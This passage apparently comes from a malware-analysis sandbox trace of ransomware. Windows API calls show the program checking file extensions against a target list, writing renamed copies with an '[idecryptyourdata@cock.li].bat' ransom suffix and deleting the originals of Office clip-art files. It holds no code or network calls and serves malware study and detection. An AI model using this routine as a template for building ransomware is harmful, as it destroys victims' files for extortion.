SetEndOfFile (hFile=0x370) returned 1 [0066.517] CloseHandle (hObject=0x370) returned 1 [0066.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf")) returned 1 [0066.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.517] lstrlenW (lpString=".doc") returned 4 [0066.518] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString=".docx") returned 5 [0066.518] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.518] lstrlenW (lpString=".pdf") returned 4 [0066.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString=".xls") returned 4 [0066.518] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.518] lstrlenW (lpString=".xlsx") returned 5 [0066.518] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.518] lstrlenW (lpString=".ppt") returned 4 [0066.518] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.518] lstrlenW (lpString=".zip") returned 4 [0066.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.518] lstrlenW (lpString=".rar") returned 4 [0066.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString=".bz2") returned 4 [0066.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString=".7z") returned 3 [0066.518] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.518] lstrlenW (lpString=".dbf") returned 4 [0066.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.518] lstrlenW (lpString=".1cd") returned 4 [0066.518] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 68 [0066.518] lstrlenW (lpString=".jpg") returned 4 [0066.518] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.519] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.519] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.519] GetLastError () returned 0x0 [0066.519] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x88c, lpOverlapped=0x0) returned 1 [0066.525] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x890, lpOverlapped=0x0) returned 1 [0066.526] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.526] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.526] SetEndOfFile (hFile=0x368) returned 1 [0066.526] CloseHandle (hObject=0x368) returned 1 [0066.526] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.526] SetEndOfFile (hFile=0x370) returned 1 [0066.527] CloseHandle (hObject=0x370) returned 1 [0066.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf")) returned 1 [0066.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0066.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0066.528] lstrlenW (lpString=".doc") returned 4 [0066.528] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.528] lstrlenW (lpString=".docx") returned 5 [0066.528] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.528] lstrlenW (lpString=".pdf") returned 4 [0066.528] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.528] lstrlenW (lpString=".xls") returned 4 [0066.528] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.528] lstrlenW (lpString=".xlsx") returned 5 [0066.528] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.528] lstrlenW (lpString=".ppt") returned 4 [0066.528] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0066.528] lstrlenW (lpString=".zip") returned 4 [0066.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.815] lstrlenW (lpString=".rar") returned 4 [0067.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.815] lstrlenW (lpString=".bz2") returned 4 [0067.815] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.815] lstrlenW (lpString=".7z") returned 3 [0067.815] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0067.815] lstrlenW (lpString=".dbf") returned 4 [0067.815] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0067.815] lstrlenW (lpString=".1cd") returned 4 [0067.815] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 68 [0067.815] lstrlenW (lpString=".jpg") returned 4 [0067.815] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.816] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.816] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.120] GetLastError () returned 0x0 [0068.120] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4f4, lpOverlapped=0x0) returned 1 [0068.218] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x500, lpOverlapped=0x0) returned 1 [0068.219] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.219] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.219] SetEndOfFile (hFile=0x3a0) returned 1 [0068.219] CloseHandle (hObject=0x3a0) returned 1 [0068.219] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.219] SetEndOfFile (hFile=0x384) returned 1 [0068.220] CloseHandle (hObject=0x384) returned 1 [0068.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.220] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf")) returned 1 [0068.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.221] lstrlenW (lpString=".doc") returned 4 [0068.221] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.221] lstrlenW (lpString=".docx") returned 5 [0068.221] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.221] lstrlenW (lpString=".pdf") returned 4 [0068.221] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.221] lstrlenW (lpString=".xls") returned 4 [0068.221] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.221] lstrlenW (lpString=".xlsx") returned 5 [0068.221] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.221] lstrlenW (lpString=".ppt") returned 4 [0068.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.221] lstrlenW (lpString=".zip") returned 4 [0068.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.221] lstrlenW (lpString=".rar") returned 4 [0068.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.221] lstrlenW (lpString=".bz2") returned 4 [0068.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.221] lstrlenW (lpString=".7z") returned 3 [0068.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.222] lstrlenW (lpString=".dbf") returned 4 [0068.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.222] lstrlenW (lpString=".1cd") returned 4 [0068.222] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 68 [0068.222] lstrlenW (lpString=".jpg") returned 4 [0068.222] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.222] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.222] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.222] GetLastError () returned 0x0 [0068.223] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1388, lpOverlapped=0x0) returned 1 [0068.238] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1390, lpOverlapped=0x0) returned 1 [0068.239] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.239] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.239] SetEndOfFile (hFile=0x3a0) returned 1 [0068.239] CloseHandle (hObject=0x3a0) returned 1 [0068.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.239] SetEndOfFile (hFile=0x384) returned 1 [0068.240] CloseHandle (hObject=0x384) returned 1 [0068.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf")) returned 1 [0068.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.241] lstrlenW (lpString=".doc") returned 4 [0068.241] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString=".docx") returned 5 [0068.241] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.241] lstrlenW (lpString=".pdf") returned 4 [0068.241] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString=".xls") returned 4 [0068.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.241] lstrlenW (lpString=".xlsx") returned 5 [0068.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.241] lstrlenW (lpString=".ppt") returned 4 [0068.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.241] lstrlenW (lpString=".zip") returned 4 [0068.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.241] lstrlenW (lpString=".rar") returned 4 [0068.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString=".bz2") returned 4 [0068.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString=".7z") returned 3 [0068.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.241] lstrlenW (lpString=".dbf") returned 4 [0068.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.241] lstrlenW (lpString=".1cd") returned 4 [0068.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 68 [0068.242] lstrlenW (lpString=".jpg") returned 4 [0068.242] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.242] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.242] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.242] GetLastError () returned 0x0 [0068.242] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1780, lpOverlapped=0x0) returned 1 [0068.262] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1790, lpOverlapped=0x0) returned 1 [0068.263] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.265] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.266] SetEndOfFile (hFile=0x3a0) returned 1 [0068.266] CloseHandle (hObject=0x3a0) returned 1 [0068.266] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.266] SetEndOfFile (hFile=0x384) returned 1 [0068.267] CloseHandle (hObject=0x384) returned 1 [0068.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf")) returned 1 [0068.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.267] lstrlenW (lpString=".doc") returned 4 [0068.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString=".docx") returned 5 [0068.268] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.268] lstrlenW (lpString=".pdf") returned 4 [0068.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString=".xls") returned 4 [0068.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.268] lstrlenW (lpString=".xlsx") returned 5 [0068.268] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.268] lstrlenW (lpString=".ppt") returned 4 [0068.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.268] lstrlenW (lpString=".zip") returned 4 [0068.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.268] lstrlenW (lpString=".rar") returned 4 [0068.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString=".bz2") returned 4 [0068.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString=".7z") returned 3 [0068.268] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.268] lstrlenW (lpString=".dbf") returned 4 [0068.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.268] lstrlenW (lpString=".1cd") returned 4 [0068.268] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 68 [0068.268] lstrlenW (lpString=".jpg") returned 4 [0068.268] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.270] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.270] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0068.271] GetLastError () returned 0x0 [0068.271] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1526, lpOverlapped=0x0) returned 1 [0068.274] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1530, lpOverlapped=0x0) returned 1 [0068.275] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.275] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.275] SetEndOfFile (hFile=0x3a0) returned 1 [0068.275] CloseHandle (hObject=0x3a0) returned 1 [0068.275] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.275] SetEndOfFile (hFile=0x384) returned 1 [0068.276] CloseHandle (hObject=0x384) returned 1 [0068.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.276] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf")) returned 1 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString=".doc") returned 4 [0068.277] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString=".docx") returned 5 [0068.277] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.277] lstrlenW (lpString=".pdf") returned 4 [0068.277] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString=".xls") returned 4 [0068.277] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.277] lstrlenW (lpString=".xlsx") returned 5 [0068.277] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.277] lstrlenW (lpString=".ppt") returned 4 [0068.277] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 68 [0068.277] lstrlenW (lpString=".zip") returned 4 [0068.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.277] lstrlenW (lpString=".rar") returned 4 [0068.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.277] lstrlenW (lpString=".bz2") returned 4 [0068.277] lstrcmpiW 